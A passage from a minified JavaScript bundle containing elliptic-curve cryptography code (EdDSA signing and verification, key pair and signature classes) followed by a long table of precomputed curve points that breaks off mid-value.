M=this.keyFromPublic(y),p=this.hashInt(_.Rencoded(),M.pubBytes(),b),D=this.g.mul(_.S());return _.R().add(M.pub().mul(p)).eq(D)},E.prototype.hashInt=function(){for(var b=this.hash(),_=0;_<arguments.length;_++)b.update(arguments[_]);return $.intFromLE(b.digest()).umod(this.curve.n)},E.prototype.keyFromPublic=function(b){return Q.fromPublic(this,b)},E.prototype.keyFromSecret=function(b){return Q.fromSecret(this,b)},E.prototype.makeSignature=function(b){return b instanceof F?b:new F(this,b)},E.prototype.encodePoint=function(b){var _=b.getY().toArray("le",this.encodingLength);return _[this.encodingLength-1]|=b.getX().isOdd()?128:0,_},E.prototype.decodePoint=function(b){var _=(b=$.parseBytes(b)).length-1,y=b.slice(0,_).concat(-129&b[_]),M=0!=(128&b[_]),p=$.intFromLE(y);return this.curve.pointFromY(p,M)},E.prototype.encodeInt=function(b){return b.toArray("le",this.encodingLength)},E.prototype.decodeInt=function(b){return $.intFromLE(b)},E.prototype.isPoint=function(b){return b instanceof this.pointClass}},993:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=ie.assert,$=ie.parseBytes,ae=ie.cachedProperty;function I(Q,F){this.eddsa=Q,this._secret=$(F.secret),Q.isPoint(F.pub)?this._pub=F.pub:this._pubBytes=$(F.pub)}I.fromPublic=function(F,E){return E instanceof I?E:new I(F,{pub:E})},I.fromSecret=function(F,E){return E instanceof I?E:new I(F,{secret:E})},I.prototype.secret=function(){return this._secret},ae(I,"pubBytes",function(){return this.eddsa.encodePoint(this.pub())}),ae(I,"pub",function(){return this._pubBytes?this.eddsa.decodePoint(this._pubBytes):this.eddsa.g.mul(this.priv())}),ae(I,"privBytes",function(){var F=this.eddsa,E=this.hash(),g=F.encodingLength-1,b=E.slice(0,F.encodingLength);return b[0]&=248,b[g]&=127,b[g]|=64,b}),ae(I,"priv",function(){return this.eddsa.decodeInt(this.privBytes())}),ae(I,"hash",function(){return this.eddsa.hash().update(this.secret()).digest()}),ae(I,"messagePrefix",function(){return this.hash().slice(this.eddsa.encodingLength)}),I.prototype.sign=function(F){return j(this._secret,"KeyPair can only verify"),this.eddsa.sign(F,this)},I.prototype.verify=function(F,E){return this.eddsa.verify(F,E,this)},I.prototype.getSecret=function(F){return j(this._secret,"KeyPair is public only"),ie.encode(this.secret(),F)},I.prototype.getPublic=function(F){return ie.encode(this.pubBytes(),F)},Pe.exports=I},2131:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.assert,ae=j.cachedProperty,I=j.parseBytes;function Q(F,E){this.eddsa=F,"object"!=typeof E&&(E=I(E)),Array.isArray(E)&&(E={R:E.slice(0,F.encodingLength),S:E.slice(F.encodingLength)}),$(E.R&&E.S,"Signature without R or S"),F.isPoint(E.R)&&(this._R=E.R),E.S instanceof ie&&(this._S=E.S),this._Rencoded=Array.isArray(E.R)?E.R:E.Rencoded,this._Sencoded=Array.isArray(E.S)?E.S:E.Sencoded}ae(Q,"S",function(){return this.eddsa.decodeInt(this.Sencoded())}),ae(Q,"R",function(){return this.eddsa.decodePoint(this.Rencoded())}),ae(Q,"Rencoded",function(){return this.eddsa.encodePoint(this.R())}),ae(Q,"Sencoded",function(){return this.eddsa.encodeInt(this.S())}),Q.prototype.toBytes=function(){return this.Rencoded().concat(this.Sencoded())},Q.prototype.toHex=function(){return j.encode(this.toBytes(),"hex").toUpperCase()},Pe.exports=Q},5862:Pe=>{Pe.exports={doubles:{step:4,points:[["e60fce93b59e9ec53011aabc21c23e97b2a31369b87a5ae9c44ee89e2a6dec0a","f7e3507399e595929db99f34f57937101296891e44d23f0be1f32cce69616821"],["8282263212c609d9ea2a6e3e172de238d8c39cabd5ac1ca10646e23fd5f51508","11f8a8098557dfe45e8256e830b60ace62d613ac2f7b17bed31b6eaff6e26caf"],["175e159f728b865a72f99cc6c6fc846de0b93833fd2222ed73fce5b551e5b739","d3506e0d9e3c79eba4ef97a51ff71f5eacb5955add24345c6efa6ffee9fed695"],["363d90d447b00c9c99ceac05b6262ee053441c7e55552ffe526bad8f83ff4640","4e273adfc732221953b445397f3363145b9a89008199ecb62003c7f3bee9de9"],["8b4b5f165df3c2be8c6244b5b745638843e4a781a15bcd1b69f79a55dffdf80c","4aad0a6f68d308b4b3fbd7813ab0da04f9e336546162ee56b3eff0c65fd4fd36"],["723cbaa6e5db996d6bf771c00bd548c7b700dbffa6c0e77bcb6115925232fcda","96e867b5595cc498a921137488824d6e2660a0653779494801dc069d9eb39f5f"],["eebfa4d493bebf98ba5feec812c2d3b50947961237a919839a533eca0e7dd7fa","5d9a8ca3970ef0f269ee7edaf178089d9ae4cdc3a711f712ddfd4fdae1de8999"],["100f44da696e71672791d0a09b7bde459f1215a29b3c03bfefd7835b39a48db0","cdd9e13192a00b772ec8f3300c090666b7ff4a18ff5195ac0fbd5cd62bc65a09"],["e1031be262c7ed1b1dc9227a4a04c017a77f8d4464f3b3852c8acde6e534fd2d","9d7061928940405e6bb6a4176597535af292dd419e1ced79a44f18f29456a00d"],["feea6cae46d55b530ac2839f143bd7ec5cf8b266a41d6af52d5e688d9094696d","e57c6b6c97dce1bab06e4e12bf3ecd5c981c8957cc41442d3155debf18090088"],["da67a91d91049cdcb367be4be6ffca3cfeed657d808583de33fa978bc1ec6cb1","9bacaa35481642bc41f463f7ec9780e5dec7adc508f740a17e9ea8e27a68be1d"],["53904faa0b334cdda6e000935ef22151ec08d0f7bb11069f57545ccc1a37b7c0","5bc087d0bc80106d88c9eccac20d3c1c13999981e14434699dcb096b022771c8"],["8e7bcd0bd35983a7719cca7764ca906779b53a043a9b8bcaeff959f43ad86047","10b7770b2a3da4b3940310420ca9514579e88e2e47fd68b3ea10047e8460372a"],["385eed34c1cdff21e6d0818689b81bde71a7f4f18397e6690a841e1599c43862","283bebc3e8ea23f56701de19e9ebf4576b304eec2086dc8cc0458fe5542e5453"],["6f9d9b803ecf191637c73a4413dfa180fddf84a5947fbc9c606ed86c3fac3a7","7c80c68e603059ba69b8e2a30e45c4d47ea4dd2f5c281002d86890603a842160"],["3322d401243c4e2582a2147c104d6ecbf774d163db0f5e5313b7e0e742d0e6bd","56e70797e9664ef5bfb019bc4ddaf9b72805f63ea2873af624f3a2e96c28b2a0"],["85672c7d2de0b7da2bd1770d89665868741b3f9af7643397721d74d28134ab83","7c481b9b5b43b2eb6374049bfa62c2e5e77f17fcc5298f44c8e3094f790313a6"],["948bf809b1988a46b06c9f1919413b10f9226c60f668832ffd959af60c82a0a","53a562856dcb6646dc6b74c5d1c3418c6d4dff08c97cd2bed4cb7f88d8c8e589"],["6260ce7f461801c34f067ce0f02873a8f1b0e44dfc69752accecd819f38fd8e8","bc2da82b6fa5b571a7f09049776a1ef7ecd292238051c198c1a84e95b2b4ae17"],["e5037de0afc1d8d43d8348414bbf4103043ec8f575bfdc432953cc8d2037fa2d","4571534baa94d3b5f9f98d09fb990bddbd5f5b03ec481f10e0e5dc841d755bda"],["e06372b0f4a207adf5ea905e8f1771b4e7e8dbd1c6a6c5b725866a0ae4fce725","7a908974bce18cfe12a27bb2ad5a488cd7484a7787104870b27034f94eee31dd"],["213c7a715cd5d45358d0bbf9dc0ce02204b10bdde2a3f58540ad6908d0559754","4b6dad0b5ae462507013ad06245ba190bb4850f5f36a7eeddff2c27534b458f2"],["4e7c272a7af4b34e8dbb9352a5419a87e2838c70adc62cddf0cc3a3b08fbd53c","17749c766c9d0b18e16fd09f6def681b530b9614bff7dd33e0b3941817dcaae6"],["fea74e3dbe778b1b10f238ad61686aa5c76e3db2be43057632427e2840fb27b6","6e0568db9b0b13297cf674deccb6af93126b596b973f7b77701d3db7f23cb96f"],["76e64113f677cf0e10a2570d599968d31544e179b760432952c02a4417bdde39","c90ddf8dee4e95cf577066d70681f0d35e2a33d2b56d2032b4b1752d1901ac01"],["c738c56b03b2abe1e8281baa743f8f9a8f7cc643df26cbee3ab150242bcbb891","893fb578951ad2537f718f2eacbfbbbb82314eef7880cfe917e735d9699a84c3"],["d895626548b65b81e264c7637c972877d1d72e5f3a925014372e9f6588f6c14b","febfaa38f2bc7eae728ec60818c340eb03428d632bb067e179363ed75d7d991f"],["b8da94032a957518eb0f6433571e8761ceffc73693e84edd49150a564f676e03","2804dfa44805a1e4d7c99cc9762808b092cc584d95ff3b511488e4e74efdf6e7"],["e80fea14441fb33a7d8adab9475d7fab2019effb5156a792f1a11778e3c0df5d","eed1de7f638e00771e89768ca3ca94472d155e80af322ea9fcb4291b6ac9ec78"],["a301697bdfcd704313ba48e51d567543f2a182031efd6915ddc07bbcc4e16070","7370f91cfb67e4f5081809fa25d40f9b1735dbf7c0a11a130c0d1a041e177ea1"],["90ad85b389d6b936463f9d0512678de208cc330b11307fffab7ac63e3fb04ed4","e507a3620a38261affdcbd9427222b839aefabe1582894d991d4d48cb6ef150"],["8f68b9d2f63b5f339239c1ad981f162ee88c5678723ea3351b7b444c9ec4c0da","662a9f2dba063986de1d90c2b6be215dbbea2cfe95510bfdf23cbf79501fff82"],["e4f3fb0176af85d65ff99ff9198c36091f48e86503681e3e6686fd5053231e11","1e63633ad0ef4f1c1661a6d0ea02b7286cc7e74ec951d1c9822c38576feb73bc"],["8c00fa9b18ebf331eb961537a45a4266c7034f2f0d4e1d0716fb6eae20eae29e","efa47267fea521a1a9dc343a3736c974c2fadafa81e36c54e7d2a4c66702414b"],["e7a26ce69dd4829f3e10cec0a9e98ed3143d084f308b92c0997fddfc60cb3e41","2a758e300fa7984b471b006a1aafbb18d0a6b2c0420e83e20e8a9421cf2cfd51"],["b6459e0ee3662ec8d23540c223bcbdc571cbcb967d79424f3cf29eb3de6b80ef","67c876d06f3e06de1dadf16e5661db3c4b3ae6d48e35b2ff30bf0b61a71ba45"],["d68a80c8280bb840793234aa118f06231d6f1fc67e73c5a5deda0f5b496943e8","db8ba9fff4b586d00c4b1f9177b0e28b5b0e7b8f7845295a294c84266b133120"],["324aed7df65c804252dc0270907a30b09612aeb973449cea4095980fc28d3d5d","648a365774b61f2ff130c0c35aec1f4f19213b0c7e332843967224af96ab7c84"],["4df9c14919cde61f6d51dfdbe5fee5dceec4143ba8d1ca888e8bd373fd054c96","35ec51092d8728050974c23a1d85d4b5d506cdc288490192ebac06cad10d5d"],["9c3919a84a474870faed8a9c1cc66021523489054d7f0308cbfc99c8ac1f98cd","ddb84f0f4a4ddd57584f044bf260e641905326f76c64c8e6be7e5e03d4fc599d"],["6057170b1dd12fdf8de05f281d8e06bb91e1493a8b91d4cc5a21382120a959e5","9a1af0b26a6a4807add9a2daf71df262465152bc3ee24c65e899be932385a2a8"],["a576df8e23a08411421439a4518da31880cef0fba7d4df12b1a6973eecb94266","40a6bf20e76640b2c92b97afe58cd82c432e10a7f514d9f3ee8be11ae1b28ec8"],["7778a78c28dec3e30a05fe9629de8c38bb30d1f5cf9a3a208f763889be58ad71","34626d9ab5a5b22ff7098e12f2ff580087b38411ff24ac563b513fc1fd9f43ac"],["928955ee637a84463729fd30e7afd2ed5f96274e5ad7e5cb09eda9c06d903ac","c25621003d3f42a827b78a13093a95eeac3d26efa8a8d83fc5180e935bcd091f"],["85d0fef3ec6db109399064f3a0e3b2855645b4a907ad354527aae75163d82751","1f03648413a38c0be29d496e582cf5663e8751e96877331582c237a24eb1f962"],["ff2b0dce97eece97c1c9b6041798b85dfdfb6d8882da20308f5404824526087e","493d13fef524ba188af4c4dc54d07936c7b7ed6fb90e2ceb2c951e01f0c29907"],["827fbbe4b1e880ea9ed2b2e6301b212b57f1ee148cd6dd28780e5e2cf856e241","c60f9c923c727b0b71bef2c67d1d12687ff7a63186903166d605b68baec293ec"],["eaa649f21f51bdbae7be4ae34ce6e5217a58fdce7f47f9aa7f3b58fa2120e2b3","be3279ed5bbbb03ac69a80f89879aa5a01a6b965f13f7e59d47a5305ba5ad93d"],["e4a42d43c5cf169d9391df6decf42ee541b6d8f0c9a137401e23632dda34d24f","4d9f92e716d1c73526fc99ccfb8ad34ce886eedfa8d8e4f13a7f7131deba9414"],["1ec80fef360cbdd954160fadab352b6b92b53576a88fea4947173b9d4300bf19","aeefe93756b5340d2f3a4958a7abbf5e0146e77f6295a07b671cdc1cc107cefd"],["146a778c04670c2f91b00af4680dfa8bce3490717d58ba889ddb5928366642be","b318e0ec3354028add669827f9d4b2870aaa971d2f7e5ed1d0b297483d83efd0"],["fa50c0f61d22e5f07e3acebb1aa07b128d0012209a28b9776d76a8793180eef9","6b84c6922397eba9b72cd2872281a68a5e683293a57a213b38cd8d7d3f4f2811"],["da1d61d0ca721a11b1a5bf6b7d88e8421a288ab5d5bba5220e53d32b5f067ec2","8157f55a7c99306c79c0766161c91e2966a73899d279b48a655fba0f1ad836f1"],["a8e282ff0c9706907215ff98e8fd416615311de0446f1e062a73b0610d064e13","7f97355b8db81c09abfb7f3c5b2515888b679a3e50dd6bd6cef7c73111f4cc0c"],["174a53b9c9a285872d39e56e6913cab15d59b1fa512508c022f382de8319497c","ccc9dc37abfc9c1657b4155f2c47f9e6646b3a1d8cb9854383da13ac079afa73"],["959396981943785c3d3e57edf5018cdbe039e730e4918b3d884fdff09475b7ba","2e7e552888c331dd8ba0386a4b9cd6849c653f64c8709385e9b8abf87524f2fd"],["d2a63a50ae401e56d645a1153b109a8fcca0a43d561fba2dbb51340c9d82b151","e82d86fb6443fcb7565aee58b2948220a70f750af484ca52d4142174dcf89405"],["64587e2335471eb890ee7896d7cfdc866bacbdbd3839317b3436f9b45617e073","d99fcdd5bf6902e2ae96dd6447c299a185b90a39133aeab358299e5e9faf6589"],["8481bde0e4e4d885b3a546d3e549de042f0aa6cea250e7fd358d6c86dd45e458","38ee7b8cba5404dd84a25bf39cecb2ca900a79c42b262e556d64b1b59779057e"],["13464a57a78102aa62b6979ae817f4637ffcfed3c4b1ce30bcd6303f6caf666b","69be159004614580ef7e433453ccb0ca48f300a81d0942e13f495a907f6ecc27"],["bc4a9df5b713fe2e9aef430bcc1dc97a0cd9ccede2f28588cada3a0d2d83f366","d3a81ca6e785c06383937adf4b798caa6e8a9fbfa547b16d758d666581f33c1"],["8c28a97bf8298bc0d23d8c749452a32e694b65e30a9472a3954ab30fe5324caa","40a30463a3305193378fedf31f7cc0eb7ae784f0451cb9459e71dc73cbef9482"],["8ea9666139527a8c1dd94ce4f071fd23c8b350c5a4bb33748c4ba111faccae0","620efabbc8ee2782e24e7c0cfb95c5d735b783be9cf0f8e955af34a30e62b945"],["dd3625faef5ba06074669716bbd3788d89bdde815959968092f76cc4eb9a9787","7a188fa3520e30d461da2501045731ca941461982883395937f68d00c644a573"],["f710d79d9eb962297e4f6232b40e8f7feb2bc63814614d692c12de752408221e","ea98e67232d3b3295d3b535532115ccac8612c721851617526ae47a9c77bfc82"]]},naf:{wnd:7,points:[["f9308a019258c31049344f85f89d5229b531c845836f99b08601f113bce036f9","388f7b0f632de8140fe337e62a37f3566500a99934c2231b6cb9fd7584b8e672"],["2f8bde4d1a07209355b4a7250a5c5128e88b84bddc619ab7cba8d569b240efe4","d8ac222636e5e3d6d4dba9dda6c9c426f788271bab0d6840dca87d3aa6ac62d6"],["5cbdf0646e5db4eaa398f365f2ea7a0e3d419b7e0330e39ce92bddedcac4f9bc","6aebca40ba255960a3178d6d861a54dba813d0b813fde7b5a5082628087264da"],["acd484e2f0c7f65309ad178a9f559abde09796974c57e714c35f110dfc27ccbe","cc338921b0a7d9fd64380971763b61e9add888a4375f8e0f05cc262ac64f9c37"],["774ae7f858a9411e5ef4246b70c65aac5649980be5c17891bbec17895da008cb","d984a032eb6b5e190243dd56d7b7b365372db1e2dff9d6a8301d74c9c953c61b"],["f28773c2d975288bc7d1d205c3748651b075fbc6610e58cddeeddf8f19405aa8","ab0902e8d880a89758212eb65cdaf473a1a06da521fa91f29b5cb52db03ed81"],["d7924d4f7d43ea965a465ae3095ff41131e5946f3c85f79e44adbcf8e27e080e","581e2872a86c72a683842ec228cc6defea40af2bd896d3a5c504dc9ff6a26b58"],["defdea4cdb677750a420fee807eacf21eb9898ae79b9768766e4faa04a2d4a34","4211ab0694635168e997b0ead2a93daeced1f4a04a95c0f6cfb199f69e56eb77"],["2b4ea0a797a443d293ef5cff444f4979f06acfebd7e86d277475656138385b6c","85e89bc037945d93b343083b5a1c86131a01f60c50269763b570c854e5c09b7a"],["352bbf4a4cdd12564f93fa332ce333301d9ad40271f8107181340aef25be59d5","321eb4075348f534d59c18259dda3e1f4a1b3b2e71b1039c67bd3d8bcf81998c"],["2fa2104d6b38d11b0230010559879124e42ab8dfeff5ff29dc9cdadd4ecacc3f","2de1068295dd865b64569335bd5dd80181d70ecfc882648423ba76b532b7d67"],["9248279b09b4d68dab21a9b066edda83263c3d84e09572e269ca0cd7f5453714","73016f7bf234aade5d1aa71bdea2b1ff3fc0de2a887912ffe54a32ce97cb3402"],["daed4f2be3a8bf278e70132fb0beb7522f570e144bf615c07e996d443dee8729","a69dce4a7d6c98e8d4a1aca87ef8d7003f83c230f3afa726ab40e52290be1c55"],["c44d12c7065d812e8acf28d7cbb19f9011ecd9e9fdf281b0e6a3b5e87d22e7db","2119a460ce326cdc76c45926c982fdac0e106e861edf61c5a039063f0e0e6482"],["6a245bf6dc698504c89a20cfded60853152b695336c28063b61c65cbd269e6b4","e022cf42c2bd4a708b3f5126f16a24ad8b33ba48d0423b6efd5e6348100d8a82"],["1697ffa6fd9de627c077e3d2fe541084ce13300b0bec1146f95ae57f0d0bd6a5","b9c398f186806f5d27561506e4557433a2cf15009e498ae7adee9d63d01b2396"],["605bdb019981718b986d0f07e834cb0d9deb8360ffb7f61df982345ef27a7479","2972d2de4f8d20681a78d93ec96fe23c26bfae84fb14db43b01e1e9056b8c49"],["62d14dab4150bf497402fdc45a215e10dcb01c354959b10cfe31c7e9d87ff33d","80fc06bd8cc5b01098088a1950eed0db01aa132967ab472235f5642483b25eaf"],["80c60ad0040f27dade5b4b06c408e56b2c50e9f56b9b8b425e555c2f86308b6f","1c38303f1cc5c30f26e66bad7fe72f70a65eed4cbe7024eb1aa01f56430bd57a"],["7a9375ad6167ad54aa74c6348cc54d344cc5dc9487d847049d5eabb0fa03c8fb","d0e3fa9eca8726909559e0d79269046bdc59ea10c70ce2b02d499ec224dc7f7"],["d528ecd9b696b54c907a9ed045447a79bb408ec39b68df504bb51f459bc3ffc9","eecf41253136e5f99966f21881fd656ebc4345405c520dbc063465b521409933"],["49370a4b5f43412ea25f514e8ecdad05266115e4a7ecb1387231808f8b45963","758f3f41afd6ed428b3081b0512fd62a54c3f3afbb5b6764b653052a12949c9a"],["77f230936ee88cbbd73df930d64702ef881d811e0e1498e2f1c13eb1fc345d74","958ef42a7886b6400a08266e9ba1b37896c95330d97077cbbe8eb3c7671c60d6"],["f2dac991cc4ce4b9ea44887e5c7c0bce58c80074ab9d4dbaeb28531b7739f530","e0dedc9b3b2f8dad4da1f32dec2531df9eb5fbeb0598e4fd1a117dba703a3c37"],["463b3d9f662621fb1b4be8fbbe2520125a216cdfc9dae3debcba4850c690d45b","5ed430d78c296c3543114306dd8622d7c622e27c970a1de31cb377b01af7307e"],["f16f804244e46e2a09232d4aff3b59976b98fac14328a2d1a32496b49998f247","cedabd9b82203f7e13d206fcdf4e33d92a6c53c26e5cce26d6579962c4e31df6"],["caf754272dc84563b0352b7a14311af55d245315ace27c65369e15f7151d41d1","cb474660ef35f5f2a41b643fa5e460575f4fa9b7962232a5c32f908318a04476"],["2600ca4b282cb986f85d0f1709979d8b44a09c07cb86d7c124497bc86f082120","4119b88753c15bd6a693b03fcddbb45d5ac6be74ab5f0ef44b0be9475a7e4b40"],["7635ca72d7e8432c338ec53cd12220bc01c48685e24f7dc8c602a7746998e435","91b649609489d613d1d5e590f78e6d74ecfc061d57048bad9e76f302c5b9c61"],["754e3239f325570cdbbf4a87deee8a66b7f2b33479d468fbc1a50743bf56cc18","673fb86e5bda30fb3cd0ed304ea49a023ee33d0197a695d0c5d98093c536683"],["e3e6bd1071a1e96aff57859c82d570f0330800661d1c952f9fe2694691d9b9e8","59c9e0bba394e76f40c0aa58379a3cb6a5a2283993e90c4167002af4920e37f5"],["186b483d056a033826ae73d88f732985c4ccb1f32ba35f4b4cc47fdcf04aa6eb","3b952d32c67cf77e2e17446e204180ab21fb8090895138b4a4a797f86e80888b"],["df9d70a6b9876ce544c98561f4be4f725442e6d2b737d9c91a8321724ce0963f","55eb2dafd84d6ccd5f862b785dc39d4ab157222720ef9da217b8c45cf2ba2417"],["5edd5cc23c51e87a497ca815d5dce0f8ab52554f849ed8995de64c5f34ce7143","efae9c8dbc14130661e8cec030c89ad0c13c66c0d17a2905cdc706ab7399a868"],["290798c2b6476830da12fe02287e9e777aa3fba1c355b17a722d362f84614fba","e38da76dcd440621988d00bcf79af25d5b29c094db2a23146d003afd41943e7a"],["af3c423a95d9f5b3054754efa150ac39cd29552fe360257362dfdecef4053b45","f98a3fd831eb2b749a93b0e6f35cfb40c8cd5aa667a15581bc2feded498fd9c6"],["766dbb24d134e745cccaa28c99bf274906bb66b26dcf98df8d2fed50d884249a","744b1152eacbe5e38dcc887980da38b897584a65fa06cedd2c924f97cbac5996"],["59dbf46f8c94759ba21277c33784f41645f7b44f6c596a58ce92e666191abe3e","c534ad44175fbc300f4ea6ce648309a042ce739a7919798cd85e216c4a307f6e"],["f13ada95103c4537305e691e74e9a4a8dd647e711a95e73cb62dc6018cfd87b8","e13817b44ee14de663bf4bc808341f326949e21a6a75c2570778419bdaf5733d"],["7754b4fa0e8aced06d4167a2c59cca4cda1869c06ebadfb6488550015a88522c","30e93e864e669d82224b967c3020b8fa8d1e4e350b6cbcc537a48b57841163a2"],["948dcadf5990e048aa3874d46abef9d701858f95de8041d2a6828c99e2262519","e491a42537f6e597d5d28a3224b1bc25df9154efbd2ef1d2cbba2cae5347d57e"],["7962414450c76c1689c7b48f8202ec37fb224cf5ac0bfa1570328a8a3d7c77ab","100b610ec4ffb4760d5c1fc133ef6f6b12507a051f04ac5760afa5b29db83437"],["3514087834964b54b15b160644d915485a16977225b8847bb0dd085137ec47ca","ef0afbb2056205448e1652c48e8127fc6039e77c15c2378b7e7d15a0de293311"],["d3cc30ad6b483e4bc79ce2c9dd8bc54993e947eb8df787b442943d3f7b527eaf","8b378a22d827278d89c5e9be8f9508ae3c2ad46290358630afb34db04eede0a4"],["1624d84780732860ce1c78fcbfefe08b2b29823db913f6493975ba0ff4847610","68651cf9b6da903e0914448c6cd9d4ca896878f5282be4c8cc06e2a404078575"],["733ce80da955a8a26902c95633e62a985192474b5af207da6df7b4fd5fc61cd4","f5435a2bd2badf7d485a4d8b8db9fcce3e1ef8e0201e4578c54673bc1dc5ea1d"],["15d9441254945064cf1a1c33bbd3b49f8966c5092171e699ef258dfab81c045c","d56eb30b69463e7234f5137b73b84177434800bacebfc685fc37bbe9efe4070d"],["a1d0fcf2ec9de675b612136e5ce70d271c21417c9d2b8aaaac138599d0717940","edd77f50bcb5a3cab2e90737309667f2641462a54070f3d519212d39c197a629"],["e22fbe15c0af8ccc5780c0735f84dbe9a790badee8245c06c7ca37331cb36980","a855babad5cd60c88b430a69f53a1a7a38289154964799be43d06d77d31da06"],["311091dd9860e8e20ee13473c1155f5f69635e394704eaa74009452246cfa9b3","66db656f87d1f04fffd1f04788c06830871ec5a64feee685bd80f0b1286d8374"],["34c1fd04d301be89b31c0442d3e6ac24883928b45a9340781867d4232ec2dbdf","9414685e97b1b5954bd46f730174136d57f1ceeb487443dc5321857ba73abee"],["f219ea5d6b54701c1c14de5b557eb42a8d13f3abbcd08affcc2a5e6b049b8d63","4cb95957e83d40b0f73af4544cccf6b1f4b08d3c07b27fb8d8c2962a400766d1"],["d7b8740f74a8fbaab1f683db8f45de26543a5490bca627087236912469a0b448","fa77968128d9c92ee1010f337ad4717eff15db5ed3c049b3411e0315eaa4593b"],["32d31c222f8f6f0ef86f7c98d3a3335ead5bcd32abdd94289fe4d3091aa824bf","5f3032f5892156e39ccd3d7915b9e1da2e6dac9e6f26e961118d14b8462e1661"],["7461f371914ab32671045a155d9831ea8793d77cd59592c4340f86cbc18347b5","8ec0ba238b96bec0cbdddcae0aa442542eee1ff50c986ea6b39847b3cc092ff6"],["ee079adb1df1860074356a25aa38206a6d716b2c3e67453d287698bad7b2b2d6","8dc2412aafe3be5c4c5f37e0ecc5f9f6a446989af04c4e25ebaac479ec1c8c1e"],["16ec93e447ec83f0467b18302ee620f7e65de331874c9dc72bfd8616ba9da6b5","5e4631150e62fb40d0e8c2a7ca5804a39d58186a50e497139626778e25b0674d"],["eaa5f980c245f6f038978290afa70b6bd8855897f98b6aa485b96065d537bd99","f65f5d3e292c2e0819a528391c994624d784869d7e6ea67fb18041024edc07dc"],["78c9407544ac132692ee1910a02439958ae04877151342ea96c4b6b35a49f51","f3e0319169eb9b85d5404795539a5e68fa1fbd583c064d2462b675f194a3ddb4"],["494f4be219a1a77016dcd838431aea0001cdc8ae7a6fc688726578d9702857a5","42242a969283a5f339ba7f075e36ba2af925ce30d767ed6e55f4b031880d562c"],["a598a8030da6d86c6bc7f2f5144ea549d28211ea58faa70ebf4c1e665c1fe9b5","204b5d6f84822c307e4b4a7140737aec23fc63b65b35f86a10026dbd2d864e6b"],["c41916365abb2b5d09192f5f2dbeafec208f020f12570a184dbadc3e58595997","4f14351d0087efa49d245b328984989d5caf9450f34bfc0ed16e96b58fa9913"],["841d6063a586fa475a724604da03bc5b92a2e0d2e0a36acfe4c73a5514742881","73867f59c0659e81904f9a1c7543698e62562d6744c169ce7a36de01a8d6154"],["5e95bb399a6971d376026947f89bde2f282b33810928be4ded112ac4d70e20d5","39f23f366809085beebfc71181313775a99c9aed7d8ba38b161384c746012865"],["36e4641a53948fd476c39f8a99fd974e5ec07564b5315d8bf99471bca0ef2f66","d2424b1b1abe4eb8164227b085c9aa9456ea13493fd563e06fd51cf5694c78fc"],["336581ea7bfbbb290c191a2f507a41cf5643842170e914faeab27c2c579f726","ead12168595fe1be99252129b6e56b3391f7ab1410cd1e0ef3dcdcabd2fda224"],["8ab89816dadfd6b6a1f2634fcf00ec8403781025ed6890c4849742706bd43ede","6fdcef09f2f6d0a044e654aef624136f503d459c3e89845858a47a9129cdd24e"],["1e33f1a746c9c5778133344d9299fcaa20b0938e8acff2544bb40284b8c5fb94","60660257dd11b3aa9c8ed618d24edff2306d320f1d03010e33a7d2057f3b3b6"],["85b7c1dcb3cec1b7ee7f30ded79dd20a0ed1f4cc18cbcfcfa410361fd8f08f31","3d98a9cdd026dd43f39048f25a8847f4fcafad1895d7a633c6fed3c35e999511"],["29df9fbd8d9e46509275f4b125d6d45d7fbe9a3b878a7af872a2800661ac5f51","b4c4fe99c775a606e2d8862179139ffda61dc861c019e55cd2876eb2a27d84b"],["a0b1cae06b0a847a3fea6e671aaf8adfdfe58ca2f768105c8082b2e449fce252","ae434102edde0958ec4b19d917a6a28e6b72da1834aff0e650f049503a296cf2"],["4e8ceafb9b3e9a136dc7ff67e840295b499dfb3b2133e4ba113f2e4c0e121e5","cf2174118c8b6d7a4b48f6d534ce5c79422c086a63460502b827ce62a326683c"],["d24a44e047e19b6f5afb81c7ca2f69080a5076689a010919f42725c2b789a33b","6fb8d5591b466f8fc63db50f1c0f1c69013f996887b8244d2cdec417afea8fa3"],["ea01606a7a6c9cdd249fdfcfacb99584001edd28abbab77b5104e98e8e3b35d4","322af4908c7312b0cfbfe369f7a7b3cdb7d4494bc2823700cfd652188a3ea98d"],["af8addbf2b661c8a6c6328655eb96651252007d8c5ea31be4ad196de8ce2131f","6749e67c029b85f52a034eafd096836b2520818680e26ac8f3dfbcdb71749700"],["e3ae1974566ca06cc516d47e0fb165a674a3dabcfca15e722f0e3450f45889","2aeabe7e4531510116217f07bf4d07300de97e4874f81f533420a72eeb0bd6a4"],["591ee355313d99721cf6993ffed1e3e301993ff3ed258802075ea8ced397e246","b0ea558a113c30bea60fc4775460c7901ff0b053d25ca2bdeee98f1a4be5d196"],["11396d55fda54c49f19aa97318d8da61fa8584e47b084945077cf03255b52984","998c74a8cd45ac01289d5833a7beb4744ff536b01b257be4c5767bea93ea57a4"],["3c5d2a1ba39c5a1790000738c9e0c40b8dcdfd5468754b6405540157e017aa7a","b2284279995a34e2f9d4de7396fc18b80f9b8b9fdd270f6661f79ca4c81bd257"],["cc8704b8a60a0defa3a99a7299f2e9c3fbc395afb04ac078425ef8a1793cc030","bdd46039feed17881d1e0862db347f8cf395b74fc4bcdc4e940b74e3ac1f1b13"],["c533e4f7ea8555aacd9777ac5cad29b97dd4defccc53ee7ea204119b2889b197","6f0a256bc5efdf429a2fb6242f1a43a2d9b925bb4a4b3a26bb8e0f45eb596096"],["c14f8f2ccb27d6f109f6d08d03cc96a69ba8c34eec07bbcf566d48e33da6593","c359d6923bb398f7fd4473e16fe1c28475b740dd098075e6c0e8649113dc3a38"],["a6cbc3046bc6a450bac24789fa17115a4c9739ed75f8f21ce441f72e0b90e6ef","21ae7f4680e889bb130619e2c0f95a360ceb573c70603139862afd617fa9b9f"],["347d6d9a02c48927ebfb86c1359b1caf130a3c0267d11ce6344b39f99d43cc38","60ea7f61a353524d1c987f6ecec92f086d565ab687870cb12689ff1e31c74448"],["da6545d2181db8d983f7dcb375ef5866d47c67b1bf31c8cf855ef7437b72656a","49b96715ab6878a79e78f07ce5680c5d6673051b4935bd897fea824b77dc208a"],["c40747cc9d012cb1a13b8148309c6de7ec25d6945d657146b9d5994b8feb1111","5ca560753be2a12fc6de6caf2cb489565db936156b9514e1bb5e83037e0fa2d4"],["4e42c8ec82c99798ccf3a610be870e78338c7f713348bd34c8203ef4037f3502","7571d74ee5e0fb92a7a8b33a07783341a5492144cc54bcc40a94473693606437"],["3775ab7089bc6af823aba2e1af70b236d251cadb0c86743287522a1b3b0dedea","be5